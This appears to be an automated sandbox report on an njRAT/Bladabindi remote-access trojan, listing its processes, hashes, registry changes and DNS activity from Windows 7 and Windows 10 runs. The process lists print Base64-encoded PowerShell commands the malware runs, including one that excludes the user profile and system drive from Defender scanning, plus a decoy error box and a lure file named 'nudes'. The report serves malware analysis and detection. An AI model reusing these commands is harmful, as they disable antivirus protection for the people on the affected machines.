Analysis Overview
SHA256
ed307213c0e62af8477e9ca939b045da7498c21d7c717011a78b3b2de8dfec3a
Threat Level: Known bad
The file filetest.exe was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Checks computer location settings
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-07 05:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-07 05:24
Reported
2024-09-07 05:27
Platform
win7-20240903-en
Max time kernel
135s
Max time network
122s
Command Line
Signatures
njRAT/Bladabindi
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\filetest.exe
"C:\Users\Admin\AppData\Local\Temp\filetest.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\nudes
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\nudes"
Network
Files
memory/1444-0-0x000007FEF4F63000-0x000007FEF4F64000-memory.dmp
memory/1444-1-0x0000000000AA0000-0x0000000000AAE000-memory.dmp
memory/1444-2-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp
memory/2216-7-0x0000000002CF0000-0x0000000002D70000-memory.dmp
memory/2216-8-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/2216-9-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/1444-10-0x000007FEF4F63000-0x000007FEF4F64000-memory.dmp
memory/1444-11-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp
memory/2216-12-0x0000000002CF0000-0x0000000002D70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Server.exe
| MD5 | fa9439d61c3c28bb92a75095cf39d6bc |
| SHA1 | a959b37a215b1417e72fb7df722e9cecd8f29629 |
| SHA256 | 5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8 |
| SHA512 | 49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2 |
memory/2872-20-0x0000000000D20000-0x0000000000D2C000-memory.dmp
memory/1444-22-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c5f82a5a8c32ae47d34dd2a264e1e2af |
| SHA1 | 10a4b3342dc484358c88c9c45b41f82f69a3febf |
| SHA256 | 687d68db1da41b26737410a8067cdcff005e65a5c3ae6e7fa519bab9f5a3299f |
| SHA512 | 104e1968bb0a3e1866c91836c95e9764501aa31210f1d5ce9316447cebe45fbd299a3d851b5f37b60662c6da30a633711eb068a4f07390e0f5d9da2970801fbe |
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 12a21f0ce198028be6e5d7b8b252db20 |
| SHA1 | af8abee61c93097d53f950139cad28e8ed0c2ede |
| SHA256 | 2e39f331acbfe2b6f106c7a373f64b1b635e6542a6b5f626b17468e5dc58c4c0 |
| SHA512 | ee23c4c4ca8f8ef50931ba2c95cb7bef15cce116fc10a75759b8b8fad69cba204a998cc47407c9bd2b1266b53203cef0457c620b38a5f04e62219ee973cce32c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-07 05:24
Reported
2024-09-07 05:27
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
143s
Command Line
Signatures
njRAT/Bladabindi
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\filetest.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\filetest.exe
"C:\Users\Admin\AppData\Local\Temp\filetest.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\nudes
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/1948-0-0x00007FFC001D3000-0x00007FFC001D5000-memory.dmp
memory/1948-1-0x0000000000CF0000-0x0000000000CFE000-memory.dmp
memory/1948-2-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
memory/916-8-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_guzpaa3r.1do.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/916-13-0x000001C544B50000-0x000001C544B72000-memory.dmp
memory/916-14-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
memory/916-15-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
memory/916-18-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
memory/1948-19-0x00007FFC001D3000-0x00007FFC001D5000-memory.dmp
memory/1948-20-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Server.exe
| MD5 | fa9439d61c3c28bb92a75095cf39d6bc |
| SHA1 | a959b37a215b1417e72fb7df722e9cecd8f29629 |
| SHA256 | 5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8 |
| SHA512 | 49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 614f88cf39eb3223246afec4bf1463b4 |
| SHA1 | 74d738ee6fdada75ac1ef1645073005e3f6b6cfb |
| SHA256 | 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd |
| SHA512 | 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77 |
memory/4008-33-0x0000000000E00000-0x0000000000E0C000-memory.dmp
memory/1948-35-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4b90550f375afbfd1b52d0731e835b52 |
| SHA1 | e07b218b14743ada74fb88d4109c7acaa83e5e07 |
| SHA256 | 61787abb9fc57fdae394e0d5c15470ff78c4b97b9ebd77cd8ca1019c13a0c403 |
| SHA512 | a91918a888cdddc5d73c638d59276060461df2eee1b99d72f1c9478fd7888d3a8552ca6fdcdc219fa6e3b206c3ca32043ac1e64dcacb0a3b4bbb6820bc69718b |